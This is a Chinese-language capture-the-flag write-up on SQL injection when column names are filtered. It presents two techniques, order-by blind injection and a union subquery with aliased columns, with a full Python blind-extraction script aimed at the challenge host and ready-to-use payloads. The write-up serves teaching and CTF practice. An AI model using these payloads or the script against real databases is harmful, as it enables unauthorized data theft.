列名被禁用时注入出数据的两个tricks
2017-12-02 本文已影响31人
rivir
在LCTF 上的一道他们有什么秘密呢, 自己没有做出来,但看了大佬们的wp后颇有收获,自己总结汇总下大佬们的思路,以供参考
该题有很多坑点,报错注入出表名,列名这部分暂且不说,也算是一个很好的知识点,这里总结下在列名被禁用的情况下如何注入出数据的两个tricks
1. order by 盲注
payload:
union select 1,2,3,0x{} order by 4%23
0x{}是我们的payload, 原理是利用order by 让第四个列的值和我们的payload进行字符比较来盲注,脚本如下:
#!/usr/bin/env python
#coding:utf-8
import requests
import urllib
url = "http://182.254.246.93/entrance.php"
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'}
#hex_s = ' !"#$%&`()*+,-./0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}~'
hex_s = ["20","21","22","23","24","25","26","27","28","29","2A","2B","2C","2D","2E","2F","30","31","32","33","34","35","36","37","38","39","3A","3B","3C","3C","3D","3E","3F","40","41","42","43","44","45","46","47","48","49","4A","4B","4C","4D","4E","4F","50","51","52","53","54","55","56","57","58","59","5A","5B","5C","5D","5E","5F","60","61","62","63","64","65","66","67","68","69","6A","6B","6C","6D","6E","6F","70","71","72","73","74","75","76","77","78","79","7A","7B","7D","7E","7F"]
old_char = ''
payload = "3 union select 1,2,3,binary(0x{}) order by 4"
def access(p):
param = payload.format(old_char+p)
data = {
'pro_id':urllib.unquote(param)
}
res = requests.post(url,data=data).content
# print param
# print data
# print res
if ':2' in res:
return True
else:
return False
def erfen():
global old_char
for y in hex_s:
l = 0
r = len(hex_s)
while l<r:
mid = (l+r)/2
if access(hex_s[mid]): #
l = mid+1
else:
r = mid
old_char += hex_s[l-1]
#print l
if l > 94:
return old_char[:-2].decode('hex')
break
print 'data => ',old_char.decode('hex')
if __name__ == '__main__':
s = erfen()
print 'flag:',s[:-1]+chr(ord(s[-1])+1)
2 子查询
payload:
pro_id=-1 union select 1,(select e.4 from (select * from (select 1,2,3,4)c union select * from product_2017ctf limit 1 offset 3)e),3,4
(select e.4 from (select * from (select 1,2,3,4)c union select * from product_2017ctf limit 1 offset 3)e) //e.1,e.2,e.3分别可以查询出第一列,第二列,第三列的数据
查询出来后,我们就可以把我们查询的数据利用union联合查询插入到显位上去, 这种方法虽然简便,但其实很容易被ban, 本题的waf只是比较少的关键字,因此可以用这种方法注入出数据
